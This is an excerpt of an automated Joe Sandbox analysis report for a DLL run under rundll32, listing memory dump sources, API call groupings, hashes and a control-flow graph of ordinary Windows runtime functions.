                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Token$CurrentErrorInformationLastOpenProcessThread$AllocateEqualFreeInitialize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 64348521-0
                                                                                                                                            • Opcode ID: 60c7760728c6a4a746a0896dd83b165dd113752e42dee95d8ef29115c47e0203
                                                                                                                                            • Instruction ID: 834d127787b2faee8a44574038080d036508957a38a80e6c70e57281afcce267
                                                                                                                                            • Opcode Fuzzy Hash: 60c7760728c6a4a746a0896dd83b165dd113752e42dee95d8ef29115c47e0203
                                                                                                                                            • Instruction Fuzzy Hash: F2518072604A44CAEBA2CF21E8943DE37A4FB4CBC9F049119FA4A43B54DF39C649C710

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                                            • String ID: utf8
                                                                                                                                            • API String ID: 3069159798-905460609
                                                                                                                                            • Opcode ID: 87982d937ac6ebdb5a283f5bc56429e212a605fa33fc48f878455754156b73f4
                                                                                                                                            • Instruction ID: 411b108c764d4ace3e5c45deb51a3e56b7a9faa629776dbc87eeee4caed17a46
                                                                                                                                            • Opcode Fuzzy Hash: 87982d937ac6ebdb5a283f5bc56429e212a605fa33fc48f878455754156b73f4
                                                                                                                                            • Instruction Fuzzy Hash: D591697230878986FBA69B25D4413E923A5F78EBC0F44C129AE48477C6EF79CB59D340

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2591520935-0
                                                                                                                                            • Opcode ID: 1e9adc1dda38233dd7b140b7e964661ef5807d0160702cade7f715b77bf8ccac
                                                                                                                                            • Instruction ID: 38b54266c759988556cf6e83805a3aea8ac390e25c82b98d870ebd1b39842dbf
                                                                                                                                            • Opcode Fuzzy Hash: 1e9adc1dda38233dd7b140b7e964661ef5807d0160702cade7f715b77bf8ccac
                                                                                                                                            • Instruction Fuzzy Hash: C571ACB2704B588AFB969B60C4547EC33A0BB4EB84F44C429AE0A577C5EF38DA49D350
                                                                                                                                            APIs
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2238633743-0
                                                                                                                                            • Opcode ID: afd66515aa9948ed2773430afda3b35ef4169952e25126d91cfabf7fa8ba1592
                                                                                                                                            • Instruction ID: 5042ef007f360a4cb06860ac3989e26b2bf5c698eccc4f75d7074bb1ae39fa3f
                                                                                                                                            • Opcode Fuzzy Hash: afd66515aa9948ed2773430afda3b35ef4169952e25126d91cfabf7fa8ba1592
                                                                                                                                            • Instruction Fuzzy Hash: 2B411872605B8885EF9B8F22E5543AC67A0B76CFC4F18D121EE4A17B55DF3CCA698310
                                                                                                                                            APIs
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandledVirtual$AllocNumaUnwind
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4171051170-0
                                                                                                                                            • Opcode ID: d660c2806080f6d9061bc518b85ca7ecc7ca63128f146637c6a6910cbddaeea0
                                                                                                                                            • Instruction ID: 89a1bc4f4d59436b05440924b1a16579084504f17a163dcabdca63123fb111a8
                                                                                                                                            • Opcode Fuzzy Hash: d660c2806080f6d9061bc518b85ca7ecc7ca63128f146637c6a6910cbddaeea0
                                                                                                                                            • Instruction Fuzzy Hash: 1E317332214F8486DBA1CF25E8843DE73A4F7887A4F544216EE9D43BA9DF78C649CB10
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00000001800D663F
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DebugErrorLastOutputString
                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                            • API String ID: 4132100945-631824599
                                                                                                                                            • Opcode ID: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
                                                                                                                                            • Instruction ID: 283167450af4393c368174901eda81c10499684aeee4801c6a5cb384dfff630c
                                                                                                                                            • Opcode Fuzzy Hash: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
                                                                                                                                            • Instruction Fuzzy Hash: 55117732610B4497FB869B22E5493D932A1FB58755F40D115E64983A60EF78D278C710

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                            • Opcode ID: be5eafdf0d6c21224e5684ca46b1bc47f03edf9f52fd97c148a08c08acd9a924
                                                                                                                                            • Instruction ID: 9ec4bcfaacd67bd7be5f2c6c23ff2cc11b1865c540bc1b41079cacaeb76c1345
                                                                                                                                            • Opcode Fuzzy Hash: be5eafdf0d6c21224e5684ca46b1bc47f03edf9f52fd97c148a08c08acd9a924
                                                                                                                                            • Instruction Fuzzy Hash: 98416F3030468D42FAEB673199A53FD52425F4D7F0F65C728BA366ABD2DE289B4D9300

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Concurrency::cancel_current_taskLockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                            • String ID: bad locale name$false$true
                                                                                                                                            • API String ID: 461674175-1062449267
                                                                                                                                            • Opcode ID: 1a960a7bf9c5bdb67dcab4a702383698bc1a37f2da21523b0c3c2fa08cdc4277
                                                                                                                                            • Instruction ID: 7f4c0dd69d64a2e519a89c0408eed1bde46919adf4286db9a4fea514131e2538
                                                                                                                                            • Opcode Fuzzy Hash: 1a960a7bf9c5bdb67dcab4a702383698bc1a37f2da21523b0c3c2fa08cdc4277
                                                                                                                                            • Instruction Fuzzy Hash: 39718032701B448AFB96DFB0D4913DC33B5EB48788F458129AE4967B5ADF34C619C398

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CodeErrorExitLastObjectSingleThreadWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 113644094-0
                                                                                                                                            • Opcode ID: 701ce82fddf24a6dc0cc6819650e4a14b1158c76ac60a64b1f577d277cb7041b
                                                                                                                                            • Instruction ID: d4a4ad110a7379173bcc36970285a8a200778f275078fe0ae0b16c97a83e6880
                                                                                                                                            • Opcode Fuzzy Hash: 701ce82fddf24a6dc0cc6819650e4a14b1158c76ac60a64b1f577d277cb7041b
                                                                                                                                            • Instruction Fuzzy Hash: E702AF72606B8885EB96CFA9E4443ED77A5F788BD8F148115EE4D03BA4DF78C649C340

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$CodeDeleteErrorExitLastObjectSingleThreadWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4073839270-0
                                                                                                                                            • Opcode ID: 59bc3c8af923ec3b693e2229fb2451515bb8e98908dc82d78f268815ce38a804
                                                                                                                                            • Instruction ID: e66330fb568cf6e2aa5611fb903b84894a8c80f55f8b343ffe77ccc30def8a2f
                                                                                                                                            • Opcode Fuzzy Hash: 59bc3c8af923ec3b693e2229fb2451515bb8e98908dc82d78f268815ce38a804
                                                                                                                                            • Instruction Fuzzy Hash: 62E15A32601B489AEB92CF65E4443DC37B5F348B98F558126EB8D47B95DF38C6A9C340

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CAA
                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CB8
                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CC6
                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099D13
                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BB64
                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BC71
                                                                                                                                              • Part of subcall function 00000001800D505C: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800D508C
                                                                                                                                              • Part of subcall function 00000001800D505C: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800D5092
                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BD04
                                                                                                                                            • InitializeCriticalSection.KERNEL32 ref: 000000018009BDFA
                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BEA7
                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BF62
                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BF94
                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BF9F
                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BFAA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$Initialize$Delete$Concurrency::cancel_current_task
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3610250894-0
                                                                                                                                            • Opcode ID: a877f73eb4a0cc73d247b8665ae12c0b89afea62d282fefbff238ad0fbcf9c11
                                                                                                                                            • Instruction ID: 16dd56e71a98a8fe38ead4268d941e7a59e1ec6387c67001032f1325c4e9e75d
                                                                                                                                            • Opcode Fuzzy Hash: a877f73eb4a0cc73d247b8665ae12c0b89afea62d282fefbff238ad0fbcf9c11
                                                                                                                                            • Instruction Fuzzy Hash: 5ED17132405F8882E396CB20FD943D9B3E9FB9A790F51D21AD6DA42670DF78D698C740

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00000001800F0774,?,?,?,?,00000001800DB89A), ref: 00000001800F00A0
                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000001800F0774,?,?,?,?,00000001800DB89A), ref: 00000001800F00AC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                            • Opcode ID: bb80c46524efd334e0948ec5fde6f5b3acf71997aa830e5d0c0555cb348075c0
                                                                                                                                            • Instruction ID: 9e20b040cd1b5661f49696f8373896ce597b257fd6a3f0defee87b89056d177f
                                                                                                                                            • Opcode Fuzzy Hash: bb80c46524efd334e0948ec5fde6f5b3acf71997aa830e5d0c0555cb348075c0
                                                                                                                                            • Instruction Fuzzy Hash: 0F41E032311A4886EB97CB16A8087E62391BB4DBE0F59D129BD0D577D4EE39CA4D9300

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$FileLibraryLoadModuleNameQuery
                                                                                                                                            • String ID: Comctl32.dll$p
                                                                                                                                            • API String ID: 3104332706-195350848
                                                                                                                                            • Opcode ID: 34a2f0dbdd0e6ac07f7eb668994bf4ee3323e02dc5c56a4663ff06c3d7fa56c0
                                                                                                                                            • Instruction ID: 3af2e9fca6f2b8a444c29f43d75c3359d6cbe81a64a43693d8330885b9170935
                                                                                                                                            • Opcode Fuzzy Hash: 34a2f0dbdd0e6ac07f7eb668994bf4ee3323e02dc5c56a4663ff06c3d7fa56c0
                                                                                                                                            • Instruction Fuzzy Hash: C4413231218F4886F7A19B15F4983EA73A5F749BA4F908225E69D427E4DF7DC64CCB00
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: f$p$p
                                                                                                                                            • API String ID: 3215553584-1995029353
                                                                                                                                            • Opcode ID: ed79370b00d8e8658ded3e492e09794217c34b99c512f83fb9569cde87e5cc5f
                                                                                                                                            • Instruction ID: 96a00a691172ba3443d11c4982911cf9766be878af63e4870790c223ab62484d
                                                                                                                                            • Opcode Fuzzy Hash: ed79370b00d8e8658ded3e492e09794217c34b99c512f83fb9569cde87e5cc5f
                                                                                                                                            • Instruction Fuzzy Hash: A712947260424B86FBA65B14E054BFD72A1F7487D0FD8C215FA9147AC4DF38C6889F26

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalInitializeSection$Concurrency::cancel_current_task$CreateSemaphore
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1489690303-0
                                                                                                                                            • Opcode ID: 073037f3f5bcf2f7dd3c5580214dcea6dca69115b8242414d5a9b36cdc0c840b
                                                                                                                                            • Instruction ID: bacc5767debf166278b71937d87c4d40db06fba7c828773fc2802f3724ac9812
                                                                                                                                            • Opcode Fuzzy Hash: 073037f3f5bcf2f7dd3c5580214dcea6dca69115b8242414d5a9b36cdc0c840b
                                                                                                                                            • Instruction Fuzzy Hash: 15E1F532201F849AE7968F24E8843CD77B8F749758F519229DB9D53B64EF38C6A9C340

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1376 1800d4c5c-1800d4c98 1377 1800d4c9a-1800d4cad call 1800ed81c 1376->1377 1378 1800d4cb1-1800d4cda MultiByteToWideChar 1376->1378 1377->1378 1385 1800d4caf 1377->1385 1380 1800d4d8d 1378->1380 1381 1800d4ce0-1800d4cf3 1378->1381 1384 1800d4d8f-1800d4db4 call 1800d5000 1380->1384 1381->1380 1383 1800d4cf9-1800d4d0a 1381->1383 1386 1800d4d0c-1800d4d13 1383->1386 1387 1800d4d36-1800d4d47 call 1800db928 1383->1387 1385->1378 1390 1800d4d15 1386->1390 1391 1800d4d18-1800d4d2c call 1800d61b0 1386->1391 1395 1800d4d49 1387->1395 1396 1800d4d53-1800d4d56 1387->1396 1390->1391 1391->1380 1400 1800d4d2e-1800d4d34 1391->1400 1398 1800d4d4f 1395->1398 1396->1380 1399 1800d4d58-1800d4d7a MultiByteToWideChar 1396->1399 1398->1396 1401 1800d4d7c-1800d4d86 1399->1401 1402 1800d4db5-1800d4de4 LCMapStringEx 1399->1402 1400->1398 1401->1380 1403 1800d4d88 call 1800db930 1401->1403 1402->1401 1404 1800d4de6-1800d4dee 1402->1404 1403->1380 1405 1800d4df0-1800d4df5 1404->1405 1406 1800d4e57-1800d4e6a 1404->1406 1408 1800d4dfb-1800d4e00 1405->1408 1409 1800d4f67-1800d4f6b 1405->1409 1406->1409 1410 1800d4e70-1800d4e73 1406->1410 1408->1409 1411 1800d4e06-1800d4e36 LCMapStringEx 1408->1411 1414 1800d4f71 1409->1414 1412 1800d4eaa-1800d4eb8 call 1800db928 1410->1412 1413 1800d4e75-1800d4e7c 1410->1413 1411->1409 1417 1800d4e3c-1800d4e49 1411->1417 1425 1800d4eba 1412->1425 1426 1800d4ec4-1800d4ec7 1412->1426 1418 1800d4e7e 1413->1418 1419 1800d4e88-1800d4e9c call 1800d61b0 1413->1419 1415 1800d4f78-1800d4f7a 1414->1415 1416 1800d4f73 call 1800db930 1414->1416 1415->1384 1416->1415 1417->1415 1422 1800d4e4f-1800d4e52 1417->1422 1418->1419 1419->1409 1430 1800d4ea2-1800d4ea8 1419->1430 1422->1416 1428 1800d4ec0 1425->1428 1426->1409 1429 1800d4ecd-1800d4efe LCMapStringEx 1426->1429 1428->1426 1431 1800d4f00-1800d4f0b 1429->1431 1432 
1800d4f1a-1800d4f31 1429->1432 1430->1428 1433 1800d4f0d call 1800db930 1431->1433 1434 1800d4f12-1800d4f18 1431->1434 1435 1800d4f3e-1800d4f46 1432->1435 1436 1800d4f33-1800d4f3c 1432->1436 1433->1434 1434->1414 1438 1800d4f4b-1800d4f60 WideCharToMultiByte 1435->1438 1436->1438 1438->1409 1439 1800d4f62 call 1800db930 1438->1439 1439->1409
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiStringWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2829165498-0
                                                                                                                                            • Opcode ID: 44485f7753f9c64bca2118c71e251ed8770b17291ac18f0f18f66950d9041ec7
                                                                                                                                            • Instruction ID: 5a97a349b29dd6e7b5ac608a3e284f06584119dc4d9a85b610e319804b2a6361
                                                                                                                                            • Opcode Fuzzy Hash: 44485f7753f9c64bca2118c71e251ed8770b17291ac18f0f18f66950d9041ec7
                                                                                                                                            • Instruction Fuzzy Hash: D091727360078486EBE68F2594403ADB2E5F748BE8F548725FE594BBD4DF38C6098710
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                            • Opcode ID: 24677e321ac5ee4d1a04d18d3265de91d17da8cb2206eb616759a8d8e1f823ff
                                                                                                                                            • Instruction ID: 61791d6681c3f4ad3dfa316d05c0a73c09026118eba7547e925a0575426d869f
                                                                                                                                            • Opcode Fuzzy Hash: 24677e321ac5ee4d1a04d18d3265de91d17da8cb2206eb616759a8d8e1f823ff
                                                                                                                                            • Instruction Fuzzy Hash: E231A236205A0882EAD39B65F8843DAB761E78C7E0F15C125FE98477E6DE7CC6498700
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                            • Opcode ID: dd0db9ab5b724912ec2026415335d458f002f1e7d8cb1aaf0fdef404c58ad89a
                                                                                                                                            • Instruction ID: 3e18f53febbc17cc81b0eea23b64b476764291fb2201fd083bcd6cee7e18a8ac
                                                                                                                                            • Opcode Fuzzy Hash: dd0db9ab5b724912ec2026415335d458f002f1e7d8cb1aaf0fdef404c58ad89a
                                                                                                                                            • Instruction Fuzzy Hash: 99217F36201E0845EA929B65E8C43E96362F78CBE5F45C225BE1C477F6DF68C649C704
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFC7B
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCB1
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCDE
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCEF
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFD00
